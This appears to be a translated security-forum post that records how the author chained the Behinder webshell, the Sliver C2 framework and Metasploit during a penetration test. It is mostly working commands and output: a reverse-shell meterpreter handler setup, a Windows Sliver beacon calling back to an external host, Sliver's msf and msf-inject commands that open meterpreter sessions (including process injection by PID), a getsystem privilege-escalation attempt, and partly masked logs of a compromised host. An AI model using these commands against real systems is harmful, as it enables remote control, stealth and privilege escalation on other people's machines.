This post was last edited by jiangmingzi on 2023-9-27 18:14
信安404, 2023-09-27 08:01, posted from Tianjin
0x0 Preface

The background of this article is an authorized penetration test in which I used sliver. Because sliver's ecosystem is not yet as mature as Cobalt Strike's, I thought of linking sliver with msf. As of the time of writing (2023.9.25) I found no articles online about linking sliver with msf, so I am writing down the process and some pitfalls here.

0x1 Behinder (冰蝎) linked with MSF

Behinder provides a one-click link to MSF, but there is a pitfall: whatever type of webshell you use, you must configure the matching type of payload. As the screenshot shows, I was using a jsp webshell, so both Behinder and msf had to be configured to listen with (use) the same payload. If you are using a php webshell, both sides must likewise be configured to match.

```
root@silver:/tmp# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
```
Linking msf through a webshell has many drawbacks, however. Because the MSF session is spawned from the jsp webshell, many payloads reported that they were not supported when I tried to escalate privileges. So unless there is no other option, I do not consider connecting to msf from the webshell.

0x2 Behinder && sliver

First, bring the host online in sliver. In the previous article every host brought online was Linux; this time I happened to get a Windows box, so it was a good chance to test that as well.

```
sliver > generate --mtls xxx.xxx.store:60001 --os windows --max-errors 99999 beacon
```
After generating the beacon, upload it through Behinder and execute it.

0x3 sliver linked with MSF

sliver provides native msf integration. There are two methods: one is msf, the other is msf-inject.

```
sliver (CRUCIAL_ANT) > msf
msf        msf-inject
```
sliver (msf)

msf does not depend on an existing process; it directly creates a new process to link with msf (in theory the msf listener should be started first; mind the order).

```
sliver (CRUCIAL_ANT) > msf --help
Command: msf [--lhost] <options>
About: Execute a metasploit payload in the current process.
Usage:
======
  msf [flags]
Flags:
======
  -e, --encoder    string  msf encoder
  -h, --help               display help
  -i, --iterations int     iterations of the encoder (default: 1)
  -L, --lhost      string  listen host
  -l, --lport      int     listen port (default: 4444)
  -m, --payload    string  msf payload (default: meterpreter_reverse_https)
  -t, --timeout    int     command timeout in seconds (default: 60)
sliver (CRUCIAL_ANT) > msf --lhost 104.244.xxx.xxx --lport 9091   # the connection starts here
```
Note that sliver (msf) uses windows/meterpreter/reverse_https by default, so msf must be configured as

```
set payload windows/meterpreter/reverse_https
```
I did not test other payloads; if you are interested, you can test them yourself.

```
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lport 9091
lport => 9091
msf6 exploit(multi/handler) > run
Started HTTPS reverse handler on https://104.244.xx.xx:9091
[!] https://104.244.xx.178:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Without a database connected that payload UUID tracking will not work!
https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Redirecting stageless connection from /gTKpn_XtlYyiqqOox7p-uQogDVenEnB9BtINB5lY with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51'
[!] https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Without a database connected that payload UUID tracking will not work!
https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Attaching orphaned/stageless session...
[!] https://104.244.xx.xx:9091 handling request from 189.46.xx.xx; (UUID: 7rqogfyl) Without a database connected that payload UUID tracking will not work!
Meterpreter session 2 opened (104.244.xx.xx:9091 -> 189.46.xx.xx:62584) at 2023-09-24 18:02:29 -0700
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
```
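As an added example (not code from the original post), a small Python parser for multi/handler output shaped like the transcript above: it groups the check-ins by payload UUID, flags the "Without a database connected" warning the author hit, and lists which sessions actually opened, so the "Empty response ... but the session had already arrived" situation is visible from the log rather than by switching windows. The sample lines, addresses and UUID are constructed placeholders.

```python
import re
from typing import Dict

# Constructed sample lines modelled on the multi/handler transcript above;
# the IPs (RFC 5737 ranges) and the UUID are placeholders, not engagement data.
SAMPLE_LOG = """\
Started HTTPS reverse handler on https://203.0.113.10:9091
[!] https://203.0.113.10:9091 handling request from 198.51.100.7; (UUID: abcd1234) Without a database connected that payload UUID tracking will not work!
https://203.0.113.10:9091 handling request from 198.51.100.7; (UUID: abcd1234) Redirecting stageless connection from /placeholder with UA 'Mozilla/5.0'
https://203.0.113.10:9091 handling request from 198.51.100.7; (UUID: abcd1234) Attaching orphaned/stageless session...
Meterpreter session 2 opened (203.0.113.10:9091 -> 198.51.100.7:62584) at 2023-09-24 18:02:29 -0700
"""

REQUEST_RE = re.compile(
    r"handling request from (?P<src>[\d.]+); \(UUID: (?P<uuid>\w+)\) (?P<msg>.*)")
SESSION_RE = re.compile(
    r"Meterpreter session (?P<sid>\d+) opened \((?P<local>[\d.:]+) -> (?P<remote>[\d.:]+)\)")
NO_DB_MSG = "Without a database connected"


def parse_handler_log(text: str) -> Dict[str, object]:
    """Summarise a multi/handler transcript.

    Returns the source address and stageless flag per payload UUID, whether
    msfdb was missing (UUID tracking disabled), and every session that opened.
    """
    summary: Dict[str, object] = {"uuids": {}, "db_missing": False, "sessions": []}
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            entry = summary["uuids"].setdefault(
                m.group("uuid"), {"src": m.group("src"), "stageless": False})
            if NO_DB_MSG in m.group("msg"):
                summary["db_missing"] = True       # the warning repeated in the transcript
            elif "stageless" in m.group("msg"):
                entry["stageless"] = True          # stageless payload, as sliver's msf command uses
            continue
        m = SESSION_RE.search(line)
        if m:
            summary["sessions"].append(
                {"id": int(m.group("sid")), "remote": m.group("remote")})
    return summary
```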
sliver (msf-inject)

msf-inject requires you to specify a local process that you have permission over and that has a session, and links to msf through it. My guess is that it injects into that process so that the session is hidden.

The only difference from sliver (msf) is that msf-inject requires a process pid.

```
sliver (CRUCIAL_ANT) > msf-inject --lhost 104.244.xx.xx --lport 9091 --pid 9352
[!] Empty response from msf payload injection task
```

The above is the operation on the sliver console; the MSF configuration is as follows:

```
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lport 9091
lport => 9091
msf6 exploit(multi/handler) > run
```
It reported "Empty response from msf payload injection task", and at the time I thought it had failed, but when I switched back to the other window a session had already arrived.

0x4 Afterword

There is nothing difficult in this article; it only records some pitfalls in linking sliver, Behinder and msf. sliver has many more genuinely interesting features; when I get the chance I will write some notes on the commonly used ones.